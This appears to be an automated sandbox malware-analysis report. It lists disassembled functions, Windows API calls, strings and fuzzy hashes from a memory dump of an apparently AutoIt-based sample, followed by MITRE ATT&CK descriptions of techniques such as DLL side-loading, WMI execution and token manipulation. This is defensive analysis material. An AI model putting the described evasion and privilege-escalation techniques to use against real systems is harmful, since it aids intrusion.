Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D

GetWindowRect.USER32(00000000,?), ref: 00137296
GetSysColor.USER32(00000012), ref: 001372B0

Strings

static, xrefs: 00137273

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 966a4cd18284a7e363a04130236294f585af12e41d1b2d3a8c5c1ae0bedfb922
Instruction ID: 93476fb85bc621d81c24f72e3dffc77c0d278b145e7ebe5b11256ec788aa4cb7
Opcode Fuzzy Hash: 966a4cd18284a7e363a04130236294f585af12e41d1b2d3a8c5c1ae0bedfb922
Instruction Fuzzy Hash: F821177261420AAFDF15DFA8CC45AFA7BE8EB08314F014518FE55D3291E735A8919B50

Function 000C31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0010032B
GetOpenFileNameW.COMDLG32(?), ref: 00100375

Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4

Part of subcall function 000D09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D09E4

Strings

X, xrefs: 00100343

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
Instruction ID: 443dae224c4443ab1d5d4123d3938835db8d20d7b01ccb9f9fcf2f8f5b8049dd
Opcode Fuzzy Hash: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
Instruction Fuzzy Hash: 74219371A142989FDF51DF98C845BEE7BF8AF49310F00405AE408B7282DBB55A89CFA1

Function 00136F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00136FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00136FD6

Strings

edit, xrefs: 00136FAB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 0409d41742742252d06e7988b5f8b0bf8418edb4788840d3bc5bda625eff85cc
Instruction ID: 8e0289f1e1ff9d93180c83fff551f7ef671728be5e84490298a0a2c658ab91b3
Opcode Fuzzy Hash: 0409d41742742252d06e7988b5f8b0bf8418edb4788840d3bc5bda625eff85cc
Instruction Fuzzy Hash: 3A116A71100208BBEB118E64ACA4EFB3BAEEB05378F108714FA64971E0C775DC909B60

Function 00113156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001131C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001131E8

Strings

0, xrefs: 001131BF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 940edd1f1b5b63deb4729d503d3fd5d1b70e0f8f9f94e5ddd62acf86b685f110
Instruction ID: ab109e65a59c62c8d4273a17725b9f1ff507c2452072c5a5d430c5641447c876
Opcode Fuzzy Hash: 940edd1f1b5b63deb4729d503d3fd5d1b70e0f8f9f94e5ddd62acf86b685f110
Instruction Fuzzy Hash: C8110836900214BBEB28DB98DC45BDD77BCAB15310F154131E826A72A4D770EF89CB92

Function 001228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001228F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00122921

Strings

<local>, xrefs: 001228E9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: cb58391cf708fbe12b84289ea0f96fc31f1070c224d8d69d958d0ae9cf8d0f57
Instruction ID: 0746f4096300e63452366355948c1afda122477efe848f4d395b5a8cf3f80f7d
Opcode Fuzzy Hash: cb58391cf708fbe12b84289ea0f96fc31f1070c224d8d69d958d0ae9cf8d0f57
Instruction Fuzzy Hash: ED11A370501235BAEB298F519C89EFFFBACFF16755F10422AF64556100E37099A4D6E0

Function 00128475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 001286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0012849D,?,00000000,?,?), ref: 001286F7

#10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
#9.WSOCK32(00000000,?,00000000), ref: 001284DD

Strings

255.255.255.255, xrefs: 001284B8

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: 255.255.255.255
API String ID: 626452242-2422070025
Opcode ID: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
Instruction ID: b6758620d8d31e25dfb8ccc3fbca37259127337112f668756d37b621632ff802
Opcode Fuzzy Hash: e107fd0de4b084340d9248e08663a6272a01b0e4717571ab77d8dd40b31c934b
Instruction Fuzzy Hash: AE11C47560422AABDB10EF64DC86FEEB364FF15320F10861AFA15972D2DB71A820C795

Function 001099BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00109A2B

Strings

ComboBox, xrefs: 001099CA
ListBox, xrefs: 001099F5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 41d6f5b2d01d9411691c88e0ad22900504a68763489c1cb3a33c91d40f9e3051
Instruction ID: 7f0676736a8d886c4c92d5508654dcfcd12a9e37004a41c73f3e3dcb692a39b4
Opcode Fuzzy Hash: 41d6f5b2d01d9411691c88e0ad22900504a68763489c1cb3a33c91d40f9e3051
Instruction Fuzzy Hash: 05012871A46124ABCB14EBA4CCA2DFE7369EF56320B400609F8B2532D3DF7058088650

Function 0011934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00119367
__fread_nolock.LIBCMT ref: 0011937C

Strings

EA06, xrefs: 001193AE

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
Instruction ID: 70a7c6413d52ef87dd84b883d94995fbf05d0ac6d81005a972ea956d615f5037
Opcode Fuzzy Hash: f8b2ed6e158b7e784317a3151a4f2b2bf9d85d15e48ea635a6f27a972d900189
Instruction Fuzzy Hash: A701B9729042587EDB18C6A8CC56EFEBBF89B15301F00429FF552D62C2E9B5A6189760

Function 001098B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00109923

Strings

ComboBox, xrefs: 001098C2
ListBox, xrefs: 001098ED

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9dfffb76e47ffb9b976bcfea0f6092580a7c671280c847fa7e54768227b08b52
Instruction ID: e5301c219955bfc51562f7774c7d0681324bb643822cfba18e7f5f9cb90772cb
Opcode Fuzzy Hash: 9dfffb76e47ffb9b976bcfea0f6092580a7c671280c847fa7e54768227b08b52
Instruction Fuzzy Hash: 1B01A7B6A421086BCB14EBA0C962EFF77A89F16340F50011DB892632D3DB509E1896B1

Function 0010993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 001099A6

Strings

ComboBox, xrefs: 00109947
ListBox, xrefs: 00109972

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b2f129765b7e595bcaa6bd0f4295c6ab0166ad5e2434c136d25f4250a6b233f1
Instruction ID: 7ef6a14d519b0d724d2e3b28ed939ca59cf0596753f6a667b98bf0662cb78bf0
Opcode Fuzzy Hash: b2f129765b7e595bcaa6bd0f4295c6ab0166ad5e2434c136d25f4250a6b233f1
Instruction Fuzzy Hash: BB01DBB2A4610467CB14EBA4CA52FFF77AC9F12340F500019B896B32D3DB659F189672

Function 001154E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00115501
_wcscmp.LIBCMT ref: 00115513

Strings

#32770, xrefs: 0011550D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
Instruction ID: 2b4357272bcd292660261a025dc35a00413f2abedfca76ebc8ca6cdc3c8769b4
Opcode Fuzzy Hash: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
Instruction Fuzzy Hash: ECE0617650432867D3209659AC49FD7F7ECDB45771F000027FD04D3051E670A98087E1

Function 00108892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001088A0

Part of subcall function 000D3588: _doexit.LIBCMT ref: 000D3592

Strings

AutoIt, xrefs: 00108894
Error allocating memory., xrefs: 00108899

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 98f5c8523d127da3f5eeb71901bc94be0265d81d406106e7ae86f147a676f58f
Instruction ID: f5dc441bffac166e813465e6d57b8d11e6a5bf870eca34838681dbf0f448dece
Opcode Fuzzy Hash: 98f5c8523d127da3f5eeb71901bc94be0265d81d406106e7ae86f147a676f58f
Instruction Fuzzy Hash: C2D05B3138536832D21536A47C1BFCA7A488F05B51F44442BFB48655D34EE595D041E6

Function 000EB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000EB544: _memset.LIBCMT ref: 000EB551

Part of subcall function 000D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000EB520,?,?,?,000B100A), ref: 000D0B79

IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000EB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000EB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000EB52E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
Instruction ID: ddc04a78f223ce721efadce87d4e04a198694fccfffd8562bb4c0297f667dff0
Opcode Fuzzy Hash: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
Instruction Fuzzy Hash: 38E06D74200B518FD321AF66E404B437AF0AF04745F00891EE866D7B51EBB5D588CBA1

Function 000F0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 000F0091

Part of subcall function 0012C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
Part of subcall function 0012C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000F0289

Strings

WIN_XPe, xrefs: 000F00A4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
Instruction ID: 251bbaa7e0400e92cad00cab4ba16f2125628fd2d58c7823e48ab7c601a3dac5
Opcode Fuzzy Hash: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
Instruction Fuzzy Hash: 31F0C071805109DFCB65DB61C958BFC7BF8AB48340F140085E246A25A2CB754F84EF21

Function 00119EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00119EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00119ECC

Strings

aut, xrefs: 00119EC6

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3daf7004ce30d60cd0711630022bad631c33b77256d712bb5a01edf13e497435
Instruction ID: 8d7e8c949db42e7d351e49c5583f132c03d8d1b7be1ef8f8d9b66e527d8d03a3
Opcode Fuzzy Hash: 3daf7004ce30d60cd0711630022bad631c33b77256d712bb5a01edf13e497435
Instruction Fuzzy Hash: 94D05E7954030DABDB50AB90DC4EFDABB7CDB08700F0042A1BF58910F2DBB055E48B91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

